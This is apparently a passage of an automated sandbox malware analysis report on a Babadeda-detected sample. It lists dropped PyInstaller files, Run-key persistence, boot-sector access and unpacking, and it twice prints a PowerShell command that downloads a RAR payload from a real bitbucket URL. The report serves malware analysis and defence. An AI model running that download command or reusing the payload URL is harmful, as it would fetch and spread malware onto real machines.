                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: mgne4i3n.t1d2.exe, 0000001F.00000002.3806869534.00007FFB0B574000.00000002.00000001.01000000.00000017.sdmp, clppth.exe, 0000002A.00000002.3802742975.00007FFB1DED4000.00000002.00000001.01000000.0000002F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3793790170.00007FFB0197C000.00000002.00000001.01000000.0000001D.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1935960901.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3800269232.00007FFB1C3CC000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3793790170.00007FFB0197C000.00000002.00000001.01000000.0000001D.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1935960901.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3800269232.00007FFB1C3CC000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3804653921.00007FFB0B48E000.00000002.00000001.01000000.0000001C.sdmp, clppth.exe, 00000026.00000003.1847327209.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1930590183.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476082957.000002C8869BB000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809691380.00007FFB226F3000.00000002.00000001.01000000.0000000F.sdmp, clppth.exe, 00000026.00000003.1842187984.00000156D218B000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1928851563.000002C498ACA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02479000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mgne4i3n.t1d2.exe, 0000000E.00000003.1476082957.000002C8869BB000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809691380.00007FFB226F3000.00000002.00000001.01000000.0000000F.sdmp, clppth.exe, 00000026.00000003.1842187984.00000156D218B000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1928851563.000002C498ACA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_tkinter.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3806016882.00007FFB0B4D8000.00000002.00000001.01000000.00000018.sdmp, clppth.exe, 00000026.00000003.1849282939.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1942221585.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02511000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3809064972.00007FFB1E3B9000.00000002.00000001.01000000.00000013.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1941486532.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3806753681.00007FFB23AD9000.00000002.00000001.01000000.0000002B.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3806869534.00007FFB0B574000.00000002.00000001.01000000.00000017.sdmp, clppth.exe, 0000002A.00000002.3802742975.00007FFB1DED4000.00000002.00000001.01000000.0000002F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3807780292.00007FFB1BA6D000.00000002.00000001.01000000.00000015.sdmp, clppth.exe, 0000002A.00000002.3805477731.00007FFB23A9D000.00000002.00000001.01000000.0000002D.sdmp

                        Data Obfuscation

                        barindex
                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeUnpacked PE file: 13.2.mgne4i3n.t1d1.exe.400000.0.unpack
                        Yara detected Babadeda
                        Source: Yara matchFile source: 13.0.mgne4i3n.t1d1.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.mgne4i3n.t1d1.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe, type: DROPPED
                        .NET source code contains potential unpacker
                        Source: mgne4i3n.t1d0.exe.3.dr, -.cs.Net Code: _E05F System.Reflection.Assembly.Load(byte[])
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,13_2_0040A756
                        Source: mgne4i3n.t1d0.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x7a0b7
                        Source: pyarmor_runtime.pyd.41.drStatic PE information: real checksum: 0x9e4af should be: 0xa256d
                        Source: pyarmor_runtime.pyd.14.drStatic PE information: real checksum: 0x9e4af should be: 0xa256d
                        Source: RedEngine.exeStatic PE information: real checksum: 0x0 should be: 0x7f50
                        Source: mgne4i3n.t1d1.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x1d9f9
                        Source: pyarmor_runtime.pyd.38.drStatic PE information: real checksum: 0x9e4af should be: 0xa256d
                        Source: mgne4i3n.t1d1.exe.3.drStatic PE information: section name: .code
                        Source: VCRUNTIME140.dll.14.drStatic PE information: section name: fothk
                        Source: VCRUNTIME140.dll.14.drStatic PE information: section name: _RDATA
                        Source: libcrypto-3.dll.14.drStatic PE information: section name: .00cfg
                        Source: libssl-3.dll.14.drStatic PE information: section name: .00cfg
                        Source: python312.dll.14.drStatic PE information: section name: PyRuntim
                        Source: zlib1.dll.14.drStatic PE information: section name: .xdata
                        Source: pyarmor_runtime.pyd.14.drStatic PE information: section name: .xdata
                        Source: zlib1.dll.38.drStatic PE information: section name: .xdata
                        Source: VCRUNTIME140.dll.38.drStatic PE information: section name: fothk
                        Source: VCRUNTIME140.dll.38.drStatic PE information: section name: _RDATA
                        Source: libcrypto-3.dll.38.drStatic PE information: section name: .00cfg
                        Source: libssl-3.dll.38.drStatic PE information: section name: .00cfg
                        Source: python312.dll.38.drStatic PE information: section name: PyRuntim
                        Source: pyarmor_runtime.pyd.38.drStatic PE information: section name: .xdata
                        Source: zlib1.dll.41.drStatic PE information: section name: .xdata
                        Source: VCRUNTIME140.dll.41.drStatic PE information: section name: fothk
                        Source: VCRUNTIME140.dll.41.drStatic PE information: section name: _RDATA
                        Source: libcrypto-3.dll.41.drStatic PE information: section name: .00cfg
                        Source: libssl-3.dll.41.drStatic PE information: section name: .00cfg
                        Source: python312.dll.41.drStatic PE information: section name: PyRuntim
                        Source: pyarmor_runtime.pyd.41.drStatic PE information: section name: .xdata
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB33D2A5 pushad ; iretd 3_2_00007FFAAB33D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB4595F2 push eax; ret 3_2_00007FFAAB45962D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB452A8C pushad ; retf 3_2_00007FFAAB452AA9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB4510CD push E8609E0Dh; ret 3_2_00007FFAAB4510F9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB45B588 pushad ; retf 3_2_00007FFAAB45B591
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB524C1E push cs; ret 3_2_00007FFAAB524C20
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAB527073 pushad ; iretd 3_2_00007FFAAB527075
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_04958BE9 push ss; retf 11_2_04958BEF
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFAAB45200D pushad ; retf 30_2_00007FFAAB4523E1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFAAB453F0D pushad ; iretd 30_2_00007FFAAB45407D
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_64949AE6 push qword ptr [rax+50FFF8C3h]; ret 31_2_64949AED
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0B489B0C push 82000085h; retn 0000h31_2_00007FFB0B489B11
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C413F22 push rbx; ret 42_2_00007FFB1C413F2A
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB22729B0C push 82000085h; retn 0000h42_2_00007FFB22729B11
                        Source: mgne4i3n.t1d0.exe.3.drStatic PE information: section name: .text entropy: 7.259374278277474

                        Persistence and Installation Behavior

                        barindex
                        Command shell drops VBS files
                        Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\runHidden.vbs
                        Contains functionality to infect the boot sector
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: memset,wsprintfA,CreateFileA,memset,DeviceIoControl,CloseHandle,isxdigit,isxdigit,isxdigit,isprint,memcpy,CloseHandle,strlen,memcpy, \\.\PhysicalDrive%d31_2_648D3E30
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: _snprintf,_snprintf,CreateFileA,CreateFileA,GlobalAlloc,DeviceIoControl,GlobalFree,_snprintf,CreateFileA,GlobalAlloc,GlobalAlloc,GlobalAlloc,DeviceIoControl,GlobalFree,GlobalFree,GlobalFree,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle, \\.\PhysicalDrive%d31_2_648D3A80
                        Found pyInstaller with non standard icon
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe"
                        Tries to download and execute files (via powershell)
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')"
                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\libffi-8.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\libffi-8.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\_tkinter.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\tk86t.dllJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\tk86t.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\zlib1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\libssl-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\tcl86t.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\_tkinter.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\_tkinter.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\zlib1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\zlib1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\pyarmor_runtime_000000\pyarmor_runtime.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\tcl86t.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\pyarmor_runtime_000000\pyarmor_runtime.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\libssl-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\libssl-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\libffi-8.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\tcl86t.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\tk86t.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\pyarmor_runtime_000000\pyarmor_runtime.pydJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI60002\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68282\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI15482\select.pydJump to dropped file

                        Boot Survival

                        barindex
                        Contains functionality to infect the boot sector
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: memset,wsprintfA,CreateFileA,memset,DeviceIoControl,CloseHandle,isxdigit,isxdigit,isxdigit,isprint,memcpy,CloseHandle,strlen,memcpy, \\.\PhysicalDrive%d31_2_648D3E30
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: _snprintf,_snprintf,CreateFileA,CreateFileA,GlobalAlloc,DeviceIoControl,GlobalFree,_snprintf,CreateFileA,GlobalAlloc,GlobalAlloc,GlobalAlloc,DeviceIoControl,GlobalFree,GlobalFree,GlobalFree,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle, \\.\PhysicalDrive%d31_2_648D3A80
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CLPPTH
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CLPPTH

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
